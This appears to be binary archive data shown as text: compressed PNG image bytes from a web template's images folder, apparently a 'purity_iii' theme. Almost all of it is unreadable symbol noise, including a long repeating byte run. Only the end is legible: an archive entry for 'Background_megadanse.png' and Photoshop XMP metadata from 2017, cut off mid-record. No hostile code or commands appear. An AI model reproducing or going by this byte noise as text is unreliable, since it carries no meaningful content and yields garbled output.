ң�	������W�~�3bD$��C=T3���#���W�	G�P�#/@�Z�`���B������?���0M����ꀃ)��_�7їϫ+П�H���/d�2�_��\�5�7aņ2I��R"p3��J��{�s��F=�f%Ӈ�ֆE�%=C�?��M�\�O��Ȗ��=�y=h�>�6����bԁc��>ؙ� �ZX��$Tf���T\���<����}�����<=-���r����?(�t}~Yn[�2�0�K�p���%u�2Pq#g����6�jxm�(�+V�y=�w�՝>qw7
4�|aW���{�Aʋn,�[��AZ/B/qƺ"ll�4C�?tP�&7�`�J��OƙV�:r��	Zʃ{y:u��Xm]Ǣ�,Nd�#����B���C@Y�k��P>+륊����Fr[� k�qs��r5=|�%��3���x��8��[���nxm��
�s��y����Ƽ��0��ڲ C��zŐ|��&�Ƥ��"M�3)���/�mA��'m�;��e�#�I��53�����҂��W�ע�*��<�G��ʿ�Nw����d\�YГ����T��|#�LAr�&�m�����n*�t��D,dK!�Q��MlK"�-�#I)
"��9T�O't��z(�k�e���>D��p�@=��~�Pb���S��LЙ"Q�.w�-Yވ�|���Wɤ���y�v����.��4*�*n�aˠ���hd�5{��t�H:��t�<���ĭ�I{�F���LLrD��;�b��ot6Z�We\T[>@ �[I�6tkK�ҀA�W��=KЁ�v��๻�+:��򃃘���amJ
���g/��:AX��K)��>�)_$���ٔ�I��I�$ݟϘ�eI�S�i)��;��k�#�a�r�P�W�uo��ѱ=��Q�>
�m�ok���d��4vv��7[�rU�]@�l����ț-�MQ��/#�RCϏ�G��x��f�Ƒ"�l3�AA���A5�L/�:�t�E��LӄÜ�3�+�P�`�i���
���麟F�8V-�\9Eۈ�5e0I�|_��l���⚞nj�d5�Gc�\���:ޣ�Fݫ`ߺcHL���IW{��]��)_"M�,��W1��"�W�!\�kF������ut�T�)��-5��oT�ly��Α��Ԙdtj�t8��Z8����zF�����P�d��Tu.�����ay��K�Bϼ�X���%�gMݫ���:��k�e��I�+����zEq�8LF
�)��:bMWZ�*�Qp��{�w��Oz�Z�(!�..�(,��� |�����q���fqc"��H��i�]J��h[�XS�/��_�<��HEdr�>���އ��"��}]�oL�e)G@�H�g�����X5�	4�Q�^���`���!����}e��oh�mgj�����$�(aHv�`����Zq�c�����W2��ׅd�RL���l��y{[�N���Yr"�K�L4۸7r "%��cG平/�;1�އ��ZZc����a?"���|���79�H]`��H1�b��7�$O?����������P4�;Νg)��Ҍa���ؤ���ռo[Qψ�i���i'�*By�$SSS2�8�Fl(bNg�?�C���9X��9P�x��nH
��j��4%�&��J[U�,�Jhp���
����Dg�f`d�s��.	-�7��K�&����LL�-p�evy]d`V��0��>��:l^Av*[�
Y]]�LL�� ��I8mtV `���t-<�pC�BvLS�nE�m�7�u� \
K1ċ)C<�CCr`b\�����`���"�J	�&K����|��n���ω��zw΢S(�&t���7���)��s.N��"�B.1��d�c�Lc,;�;����uk��/�����n�lc%2!���!��2��fB`�ɇJ�C��̠Qi�1""!3�1�c��ih��{Ww׾ݪ{o�}9g���=��s�6��
D:FEUW���}���=K:���_R��66�L�3�iI<^�;�,�UtaIj�f�������,��=gSr�ЬLA��4�ԅ�ǩg�E��G���k@ �$��=qG(vT�E�~�� s<�.��2=��w,�����ck�cG����;4#��#K����W����0�J�F'�tP�B]�EofA^C��[��z�{yy��e)�U�m���)�������d�&�m����+�/��#�'��n�P��dO`\���G9��O��x5�y8��Q���9�q�K�oC75�r�抬��iZ�;-
�3r�0E������A�Q0zB!<��2��ϘK� �+�j����3o}�l�K�z�>qBV�}Jrk.S8���`�ܼ,�իׅ���øB�r;j��wx��=^��3�c�N��{P0�|�~���_��>)�$�,`$j2�D�`F-E��nN��r����M6G@�Ld���j���O,,(��xsgǧ��6i�!���.y��	�؄]��I��aY���1̎��pg�J�B�wy�vL��Ŷ;�GM�V�ޱ�<r�2"��)�@�AG��S�]l����=&w?�Y�!Ǭ A����cV�ڔ��P.�"���"Ֆ�1�SSY
3�O�alzZN�u�Z������ُ���N3cR��h��<��傤p��c#�����,�g�0�sG�c�-J;>}X2�m/�f �m`��ƈG����]`�x�����Vu0t�e��7��Sox���w�E��'��ԉ,�D�|kcUl�B�\��bIx�Ayk��cb�@�U��~NڰLGU�e$���ԩ��}!�a����Z�O׵���N�o1�06=%#Xؐ�tQ�5���`wr����"�`_�����q���?�	�ش���8/�H��;��Gd�ڐ��9|���;�j��d���b^�1��>y������_���۲~�܁�����1X�$�6/
#�3�2��ASM��-M�œ	��2��'�^Z1˸���Y|���e9|tNb�P��l��-����ƭ�=g�&1)ל.X�]�S�e��:+�@Pn���X1pAG����!,,H>S�&O�Y�;�8.#���$�
{#��>|H��P�#�Wbj0�1�s �\��ć 4'F�"T4�@Dd;!uL��$ǔ�(�-;c�]�	�	G��ґ-�0��w�L>֐�E��s�;��<ޔk��ψJ%'$S���{�����
%��O�.qZ?��NA6n݀f��PF�B���h)|v�L̒Z�"MN�I�v�)���.h�q|�+��Ҭ��Zg:�D��e`��X8~�c�!�h��$�D4f=̔�{�wҫ���/rǜÇ�C��5h�bw�p�T�L",�
s{��3�;<>��A<nk�a��4L��8r�TZv�w%d�M�)ȱ 5IC�gp\�e��k�O���{UHnu���o�1XӖ5�#��꾆[�fv��gX�wD��V����W#�U���o�X鋟υ��^�c�;�/�}��L}��ehѬ5�25��pgcC��c��V��Axb��'$�E�r�v �]6:1&�rـ�Ġ^��4YWV�/�����0òq�
S��l�ċv�0EL�C�pZN�����Q�V���N�	�������弻W��A1y+�\�D�ڥ=X�0����/O�K(��\Q�7����$k�����,��		�M�Q+��8���fBj"0�X������i��o5%�*��JMl*���T�Zݒ�btD��W�xoG�N����:.��q÷w{CU���t�!E2Y�kY��ߔ׽�ڀ��|[._\�a�'��4q¹�)��:�䃋�j
2fE<�Q�1X/0
Y=�)쥼y�$�h�,������FtK�>�Ko��-v�b�D�aL�v����o�t�0���=�>������=!ģ4��R?:9���~������#��N�_ik{G��M-�%�S,�V:���0M�Q�����P�{�}Yr�[ڒ<4�v����C���6�J��A���@چ�ʸLG����'���;\pҭ�3U�z�����8�������h@��1��"쏳7n����ɛ��������K�>���TKU>�\$F,hK5J�Q�le��3?��&�܎l�o��ʪ�ٱ��w�F�t��`�f���1�<vK�ȍ�V,䏸��x@�}�I��v:V�'`��T�^�����	*�N!��);�mҳ�7��ak7o.� )������z
�J����a�Q��F[sA�+7�*�dv������+7d;�ޓw���N9|l^b7��C�Uu�h������/��xR"3!.��r>�1���.�����!5G����VS؝����"I	�PÃ2�d{mUCq|�0.D�2l�l�͸B��!C��Jaa�G3sH�5|����a�D��vJfd�54�
H�"D���4�2�Naz�lYW]w��'�Ƶ{�f��j|��72�	Ty�OU�.�$�c256$��u,L���)k�nG�"L4����ng����󗴲*�_��8r�%i-�|Z�Ą��'`�F	��4uhL��A����v�؀�����û<v���G5��!o>�~HK>�^�r�N�̏^}	���}[n~�ۺ8Z7{!���A���|x�{c�u�\~�Ӳ��K3`�4,��kN��|"��Y�R�߶vv5^L"";o�<sb`�D�P2����G������\h�۟�+5;�2P
����/������R���Z�?\ۗ�s�$!��̝Ȃ��LM�R�����&a9Gj$+���_R�Ɍ�+�U�pV$A�,hAF�ʮ}<��&�����B��4ǫ����6��>�~�r�oaΝ�~_}
T�#x⣜.�u�\��Y[})˃���/�q��4��g�uw�7�3N�H�l3Ǻ�;^,U��$��Hf +�JC2���J%�}��� ��4���
�*��5���Nb&Tu'wY����p���8�i7��9�^�~呐;���0++K};z��l��x�}8A�^#�S�:���
`[�-���r`�r{� �㒇0f�sЬ���56j�XQ8O*����oO6�8wkck[6s9)V�:@���I0TK���)�O�0k����Ƈ�����}@e��
,�]h�?���^Pz�{~���p8|����;��4S��ۄ]�O�euf2:'�¥˪UX��v�(�c�+�vv�Z�ːC�ڔ'���r��US�F:
c3�Cr��3:S�$D������i��h(VL,��z������k2=����qt�Q�Ng"��GN�����I���#/R2�y�Oc'�[��������-�#��<	;cۚ���7o��P�;:=�	2�3X$�.V�k�������6��?��vQ�>~LN/���;N�.��Q
<Q��V
R��y
�Ikޜ�=���_�Ŧ�ϊ���b,��(wf03 Z^���&�ZpM�L$�C�"�b�%Z�I+��������_��ٓ�[�fpyO�_��MɎ�h��6F���0�H�.L�£41S�8'�Y�l�Mh�EX�C�Iy�,G'�!�ǴP�x��yu$�!��Ͳf���M����������k����q'���o=e����&U��'��?�b=݅���O��ֶ��^�}�Z���X�KFY�3<2.6>H�\�ݠ�d��2m����n��LJ�,�i�u�q�PU�H������ʗJ����k�%��܂�_‚��A�OT��|%���n�+�ؑӳGer�$/]���4
ؐʿӢ�gǂ\h4k�3���0�;?��)`�c��˶[��r=!.�|htRͺZ�4�U�Z?�!�̌H:؄���^�':�5�����N[��X���28b�;y��*�c����Ę�
�YMw��λ&w�Ŋ��l�9�jy��I��d<M>�EHX���j�]X��r�[�P(�����o�.�-�H?Z�;m���X.���O�B��GN������,+�����Ƌ(00@�,:��Vі��1������I\c���N�w�e��R���coj|\݂S'O�xU�V�+a�4(�o���ܼ�3Ĭ��'�:�����b�o�}C�mI��6j��Cb+o�)�Ɏ��۫ڱ2�K��2�A�ժ��Q����h,)���v��;�Ι�M7p�g��#'�Ja|dT]j�	�,��)���k��7��������vp�w
o�v�,���z�]�VGghX�4}fp׵oG�C5'Je�2"&�XK�IG�lh�Q�I����
)��Z�r�(��%��@��-f-ae3�|cz�=s$'�Mgo'�q<���9O)��0�E��` ����eTq�E�(U�khbZ�ݬ��EcZM�h�^��e#u,&gW���[tV��l�:�+��6�M�������^N�xr@���ui��²��d�����)M^n����P�߂���"']�h2%
(9<!��U�*,��B�P>�
�����g�S�m���2h[� �E�7muX}Ij�>,Zz���`�,�Ρu�"q�����"���/������\�׃8@�Ň�|���a�\
��Ľ��w��_I;��2i�g![Z��:�4�7�/W����J_m��#����)\kM��������v���;
Kf|�8����e���1�硝�
���D>X*�Ϭ�lȑW�V�>#�Ž
Xb#�ix�6�CI��,0,��X���Z`��ʡ��•Y/{0Ck̴-��n�U��7�D"3�Y,��!�̒�‘��q��y��/���›�lZ�X�����i���A�u�Ptԏb5g�q+������B��,
�H�*8���w�߯�Q��1?�T3��G˕ʣ��f�-W�?�u�ƽ�X|.��c0I�6\���eh�����.d t�x��2�B���Y��a�=�3tK^!��+G53g���C�D�!l�X��9wǛͅf�>�4�j�Z�'�ɢLc�x��v�	��5��B\sr)h�΅H5�ş�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>�̧��T3�j�S�|��O5�f>��gK5�����_���A܈�F��޿�3~�����?�
���q<d?�I,J��x�:����=<����s؉��r�n��#�Z�g�U/hϭ�1�'[��������z�{o$��`�V-�(l��lks��v��!��vϝ�B[���Y���ϐj&�+��M�5o�%����u�\�tQ��{��0e
�1�R�$#C�z�����>tD��fe��!�����a�e��,�yv^K��yE�f/����~��bA����y���T��-��7����ڷ��&��8;aF�����kr��h���yǂ�_?v\��[ߦ�t��d�ރ�xqKx�O���z�s$c`�9�_�aP�]%����W�	��Ea�H[ZdX�<����l��:,>6�&��*ij���쬜8vB�52<6�#��gӍ�c�U�T|���%��������&0�7���>�iy�k�K�VV�KW�t�Q�����2�,eX��00��.I&SƠ##��$n�XnoWo�⍫�#ܥ}�v�1�����{�F�H�`����Y����9��ռp:nW/]�O=�	�p��.�-mb���v;�ES)�ly٭�6�'^��L�մ�0Y�VH����t����45=���t�݉�y~�)<�0�~�G��M3ח}D>��Җv���ᘪ�@C�t�a3LJ'��!KG�FϾ�1�!{��x'ƀ��E�~�=z\�?�L@��4��~���=9@5{f
_��_��޶R*ɧ��?���v�]b�6}����2��5�m�p�2G����148$��&ز�Yr�FKw�����%����T:c�}]z�9H5�1�'��~�g���ʌ�T��?�?��<��sJb.�v�y|ۖ�rӶ��1Ǽ��t
j�����RT[[C,7����<dL'�HA
hj����9�p@���-;[�p�2�V��)��s��v"��ov��Č@�P����������sf췡pQsT���Å=}�|~�e*4�}6������bIw+�+Z��h��/K�K��
�5+&�m��E�-��S���AZ<��I�$�i��JPͬ]����5Y]]V�74-;��HР���ʹhqW�hY�VW��p]��(h(��ϔ�PF�-�"�x��[±��H
�RW,�VnOC._�����c-N����@z
.�쟶0���+�꫃f��ގ�{n.;�-6aſ����ݸ[x	mj7B��	K�M!U��A�[$H~f<����@,�t��ĕ�W�U�\*���aZ��`�)��s��S_wS�&fy%�%���̵���{�ӓ�A��*��1�ly��Yy��h7+q�����+��\<n{����8�Sf��^wi���8��rl] .C�4��ڊd�"�e���"Z�F���}�����͑��3OɡCGez���[����2|�_Ē��/�����>����[$y{�)���'׭�K�|��Eʤ>J6?ێ�3C���"���O�I��{��T�ۤ�=F<���V58.�;��<C�nk�6ir|B��i$�p�<��R��v�AV�^���-���X�Gf��L����C2���(����-�E�Є�NOk��5B-e����/���N�r�$�ħ$��~�T,��e�3��1�q��}��&�q�h9���`��j�N��u��"�蟼��
]���������?Ŗ�B�ʩ|n[�>�#���f�cDw�Pf@�����i�!&�]ߧ�z\�x�j�V���3�
$N��<,NUlu=�fR��
��������LOj�U>�*�v^"gby.�n�[:95�N����ᴽ�ұz5�
��9.�)d��=��؈n�=If	G�YɎ�@{��(e`ٚ��dLg�B�pl�!f X��v�$�hH���L,�6��q	����V#�=遴4s-ũ�V�Q���U��U6�2����t��b�������CV����=UD�aw{K�w�Y���9/�J�x��
�q,�"f+%�H,�h��1v�l��T�����;!�E�{���a7&�hшGd�j}7oy�E�������Z;Ɖ�z�}Qm#�5Vov
HU��L��r�ݘN�j�Ϳ8N���)o�u��B,�����P�,���Ή���8I���a����k�r)/G�f�?��]E0�{
�>t$i�S�Qأ�dLX��(G��L�k�HŽ�i��r������S�x{uӁ�� �$m��/��	-y�[Me�ȑr���>\��/�c"x���+�=�"�H4�666�]�K���foW�f�a4�p���-I���3S���<z���TH��$�M'$Hk�,N�0���Д�����PUz�I�o��2&e�hE�2�0�U�]�Ygky��~�
t5��ku�[mi��z��q�B)���E�!7|���%/���N���)]�2,�C�����<����L��IF��Jv �ŋ��j���qxf7�"�1�޶��>f~rL���n�4�G��v�2�WL�R1h8�
xA }����<�;o�/\xW���8�oy	�����9v�m��bv�ӁdQ��hF�<&�ֺA{ݹ�-�{{y�[O`W�`�lnni̗�S���lȲ�Rp+a]�AeF�R�u
��c��QNgDr��QQe���:?o��9���U��~빧���׎���b9�ԸN�	!X���kLT.���t㸘��9q�֧�ijrR	C��\Nb�����QM���s��)��*�u�E{�
]����)�xB}&�W(�"!�=<�s��ϧFâ��	��X{��ђ0F;T3���j&i[��`D�YK�;��NT�:������;�S���$;1!�cc���)�tJ�����������r���|tdP�byWɕa7
Q��E7nl8`R�5%�Yʧiך*���YW��ƭ���c082�C�xH�E�u��K�M?�<��S�ヶ\�~��<O�t�Q��
j[���@I�ݙ�qy��2U�1b���7����`���[������W�5�I�����
Uˊ���b��q!a𢇮��	�J���VI�:���Fx�v��������3�)��tб_�����$�n�I�Gȋ�&�(�c�����Wߍ#4����`�eq�H������@h���p˅�E㬬�QI�z���l4Zډ�=�d�wz\ۄ�	%%�b�����ͅ#91`�Y�z;�A��֝��z�Ih&\������'��<I ��DE��;;3=%��.4��p#�8�1A*ֿ����0��}��|���q�1F�ÿI��?@�ʆy�Ֆ�;���ہ�3��w0�jň���Iw��6��^�G�l����,�����󙠵U�K��{d?�@�}��g
��~�h�G��A�ԉcj~����#\���\T��0}�U
j�P�iuB���w_ρ!J/�F[�6�y+dk8ĸo�GB2��ɑ[��V�Ӏ�� ��t�%E<|��xw��]��8�ɕ��>$����*qwu^���0���^� �t�uKw�����p��9_��]d?d0�Q�,Ė�9B\T:�����H`�Sr��Q�d1۟�B�9���hAv�e���d��M��s0u"}�̎-Û�����
���|r6��XES���.hu�p.�����UMA����ی�=3'���F�2��T2�x�@�T�pT�Ff�/�V*h�R
ګ�_�.Y3�ai�[C��y�{�#9��<.�ַe�T1#���yh�s��s�{!˃	t��������3^���>���<o{����$�HPdX�m��LޙN?b�Վ6+-�h��h׬R�ؠ��g$a@������X\�V+�Z�����I7ܸ5���s���eפe�Y+����k;���	������AҪ�����z	��(�EG��f�-T���V���z�f��1|2=Zj'�]��
�[.I�
����؁�/�;(WT��`~��/{[��
Wp�ww�x��bB�h4�h
B� H�L��0�^���{N��~�Nf���A	�Mn�92��Q��1��:��7��G�lK�����$h���$�\���L6\�A\jk&#�	wH�il'G�hF#2൫]+�+ŠI�FḄ��Ζ�p-�l�U
8��JE!���R��L�!y�P�cYY^ې�����e&Cr�V�H���v�CnS,�c��s�P<��&�^����z!=`���w=�CY�u3��@Q�Gۜ͆E��"m��J�� �;;!V[�C�T,�����������c맵��	~ʈ����j<��	={uGh��0�#��N�}�����{:�d^�d�2x^��z-���Ŀ�ql�nGC�dZ��	qAp�i4�N�*T/`Fpǂ��K��_n�3Wo����a5��pƷ�sj�q�1�V�NH�V,i������-i>���Ɩ�`�&l�U���pwi7kp(�H
s�]k�j)#���'r���<}dN;`Bdo�sj�$��5[/Q��x�y9��@U=A���nAM��=���M�,-����ء���C>�G���؜U�V'q7��H�pfe��mY_[���Ȕ*v��'���p��7g�F�¥K�4
�C~��;�>U?1:$q~b6cp �~��:D�~p硐���"1���?0��܍E	��bE��(�w"���Z�a?XRUa��}m8e:-+��z�ܥ�֖<	���_x����o��;��2�"�����YS�n,/����o�HqgW��xM���Ѷ�pB&�e`�v )_��3�epcgOsG�Z]�@���V)bG��)�6�%q:��,��02'�²�X�������`u�#�P�Q˳��&��Y7]�VӀ�VTQ
C�Rk����>Xw�qB�G�-�\��;R��i�ɋ*�.W��.�|(b��b��٣G�B,���7na�oI��d�E+�c��&�U�=Zq\��Ը��MBS�$��65#	��|�y9r�X�
�$��������%ʓ��I���<O(Ї��"l�_P�!���9>3.ų%c1¯����նVm9��Bx��;
��^Q�l� #0AX:��{N���p_'�Tm�pl�4%K؅��ƞ�H�4������|�CG���i"�1���iSy��7nJfs[�al6����v�6�*�"��b�l��q�w1Lv���	�I
���w��K��02��Hl��Oer���={^���$��pZb��q�-@�55>$o|�=�b���M�����O�_9*'�z�h�2t��"��a���a�BN����lE�Ak-�qD�q�i~�����!{�ޅ��1K���j6[-�i�7��ݳ�=,�9N+.s�I��-�7��n)�!� ��0����<|TY0{�ĥ0d��IE8%4�0Cq���H���d�)�&'��a57
�?��T\�e�m�j����j��_��l����"�v`X�m]��t����ۋ����$����*�AE5�l7��H&�����j�Va/DbI�e=G�:q\�3�.��Z3�}��c�QԣH}�H�VK�5�Fh���(Ű	Ji���&h�}ܔ
|+y$J��\�����i&�KYZ�~N����g� �\�Q�]j�kk-�<�a���k�7���\�ձb�����u}�2>$���`�����`Q�|gN����mPmm�#M\'��h<�F�N�j��א���)'��ס^.i
��NN�4�H[r�|��yv|��� �:,�.r�����u��}X��a�����x�Y�.�a��
��=w��̴�؉_!V	g�Q��)���M��-�z�
��qv$>
E-`�1�B�B~Og��ܰXj�*>oC����(�4�b��U�1�#��a&�@�m�g��z_w��+*��ׅw�'�;\푂��� �ma;���jl���[]��E$RJ� ����R��Ɲ-t��`M�>��
L�BP���w��!3��grgcS�,;0T%\�V�@v��f3���F��46f$9�95/5' �إ�?r��YR�]��1Z��2�tRͰJ:,��@��L�ʫ�x��VT~��j�M���ͥE%r�z�sq��Gj��H\Tu�Ǩ�tG4���ζ��h`A�����^v�!RY ������Y���,Ǎ�R��i��mv��+g(]Q�?2�;s�q�;	u��W�)��bq�	,̃v�O��8П��.&��s�԰"�
�Ue� vX��@������p;M8�a��-ZG��=����İF39��'p���1���M`�f�X�bޤ;^�ȩ��q�sVFc̶�m=�����;<=O����m��t�f���[���1 ��g���X�
5��y���"����Ĝ�~��L���
L�xw6oߔo��/�J=<?�a��X�9E&��:��"v��ԘF����ƅk��.a<�Mqk�5�Zȟ�&a��z<i�a+r`P��RE���n�)5{�_Id'��ҙ�f^��2��a� �n�����+��hZ��Q�U�������E3��Tv2�uc�ܺ|[�-�c��C�rpU�
m��X_���Q�2������[.�<_M����V�yL���(�#:�>�W��y\�W^�Ԭq��?�ֹ��9���;R�.��W�<��󲿻��l�{��Z�־�m��~Bq���𐜺礌N��*���H:&��w���,#��n�t[I�I��Cn�)dj��v��
튆�j�Q��T:���'�>[�Cx�)�P���:�s�@�,�0�ʒ�X��X� 83	&o	G��z�:46*��oS��pz�������3,3�#�5�LZ鈉8k�[PW+��?�uFfi�氙�Դ�����a�@6Rz�������9��������@0�n���3�;s�@_�
�'��\��Nwe`fHe�S��_†�Y�
T�����!�~|r�Ϡ)���a]o	�Ί(�)1܁HC��Bİ�
���R�u@;)�NJ������!΋b�{�q}�G��T/U��H4y/��Z҄��sA�둔���ۋRX�"�:t��`y�t����\oA�T%��)�����Ƒ�hLʜF����t���N��G��U�Z¢Q����k�V�������i��Ƞ�
����у�w�0�|�o�~��N~�0��}x�a�{�ݸ���zy_M�C#�no��vN�g��0'�Ѫ:��m�����	��My��oJ�tj�`H�82Sb`����Ƨ�e�Ȝ�o��D�6b�5;���]	��v�K�jv�=�聙t�GM�
������x�G��à��e�3���F�)%Ҳ�ߗ�!��P��	�旔w���k���
�Tu94;/#cs��I�ZrA����@��\ߔ��+r��+2;3.'�k�T�eXW<F�������+��X���a0~D�8?a�(I�ođ��Z�S/�?�ʕ<����$W��H&�V(-Ԩ���<���`-_��'�M�F!_B,����t�
��bpS�=:�����Ա#������j˄/[�icFߍ�ꀼ���袱��E��'
��%�h����/�����"�F]Ug@#i�0|���Wljjw,���@\3:�F�_j���	��3��Ax�eȗ���X�+��}����@��N��dl4�F`¹�,��О<�l,Z��F[�tr:s��33r�‚�҂�_��N��?	�Coz�/謖���������?����K�*ڂ�)[c�e�2�a68��l��/��=)�$���=�� ��G��,�͕��r�J%������
w��7���@„)�<�I s ���8B5j��`���x<l����~�kׯic�ê���Ǭ\._H���,�S���s{�wa�>��t�R*����-8<�:ќ�'�0�#�j�u9�)���]á���T��\&Q˲��O�}o8ff-�y944�mJ9��n���"��ҙJ
u�M��VI�?~{'YO�2\�Nt,����{_{��Ր~#�ʼ-�x�^���لZe�&7R��&��]�(��QY�ܑ%b#cfz9/D��
ó�|�;�C&���p�V�TKZ�����wӴn�φk�(DNP.�}��e(�ȱ)�~�ل��c��4wz$?������S�z8{ 
v�ݺߔ�A�һڔx4�;�ѳ)�K���9��L"*��9C6E��P�=88,�jA�[+�!nUe�8��W֔VTp�90��~I�T,M����?wlZ�f�%34,!wZ!ݓD"�
�cO��T����~{,��s��|�iS�Ǩ��ȫ�}��,'�GtN��ƶ� W8���I&a�g��D=G��FT,��ժ�k՚�����Ts����=3�b<;lù�p:�;{�4�v��X�?�N|���_Y��~�얏��5��Xp��Q�_��N4N�l�5r
��E��JC�*����B��4�($��<Q-g5��E�˨b���@(�=�tY�����(�B�,��������s��cX�w�C�thl\6�ʱ��P5=��K�bU��Z��<6�D�vX�p��x�eK^!c����1����mi�����3a�V�8h�
�����p �Ei^�Y�@�j֬����w�L8����y����qi�!���X��R�����%���dG��a6]��i�z�;������g
��K�6�팵�(?�V�H���?�g���&���_j�k���>�p�gn�}F�k�B��p�l狚�*�Z���n1i`Gw5�����
�Q?�����m��
Ȱ6�ѰC8��df�����aR^N~?�C�B�3�7��W�sG~������[y��lk������p&
K_]S;0L����bY(s\g��#�D7�S:�����V0�s
��R��EW�Q\СP8�f��@*���e�%Ζl�+��XVQ�9�(7�zR�v������NY���V �(�����-�/�P(�G���!?`�Z�:��n%�H4`i����@��p+
\� ;�Y��%i�O�j��^1�A.ջIEND�B`�PKԜ�\��W��*purity_iii/images/Background_megadanse.pngnu&1i��PNG


IHDR���}�	pHYs.#.#x�?vF�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmpMM:DocumentID>adobe:docid:photoshop:962ba18a-9174-11e7-887a-877f55956bf4</xmpMM:DocumentID>
         <xmpMM:InstanceID>xmp.iid:14e721da-b5cf-cd48-9f92-b62fb8347785</xmpMM:InstanceID>
         <xmpMM:OriginalDocumentID>2151462FC599736CB5860B868C3B3C96</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:3c72213c-95d9-cc4d-b185-890998dc5e8b</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:23:08+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:1c115609-bffe-a74a-9889-9c926555d3d4</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:23:08+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:05aec5f9-aabb-8e4d-ac4d-50e0a950b0fb</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:24:27+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:367d7928-3330-be44-94d3-9024241ef2d5</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:24:27+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:14e721da-b5cf-cd48-9f92-b62fb8347785</stEvt:instanceID>
                  <stEvt:when>2017-09-04T15:25:57+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <xmpMM:DerivedFrom rdf:parseType="Resource">
            <stRef:instanceID>xmp.iid:05aec5f9-aabb-8e4d-ac4d-50e0a950b0fb</stRef:instanceID>
            <stRef:documentID>xmp.did:1c115609-bffe-a74a-9889-9c926555d3d4</stRef:documentID>
            <stRef:originalDocumentID>2151462FC599736CB5860B868C3B3C96</stRef:originalDocumentID>
         </xmpMM:DerivedFrom>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <xmp:CreateDate>2017-08-26T22:07:20+02:00</xmp:CreateDate>
         <xmp:ModifyDate>2017-09-04T15:25:57+02:00</xmp:ModifyDate>
         <xmp:MetadataDate>2017-09-04T15:25:57+02:00</xmp:MetadataDate>
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <tiff:ImageWidth>1300</tiff:ImageWidth>
         <tiff:ImageLength>1300</tiff:ImageLength>
         <tiff:BitsPerSample>
            <rdf:Seq>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
            </rdf:Seq>
         </tiff:BitsPerSample>
         <tiff:PhotometricInterpretation>1</tiff:PhotometricInterpretation>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:SamplesPerPixel>4</tiff:SamplesPerPixel>
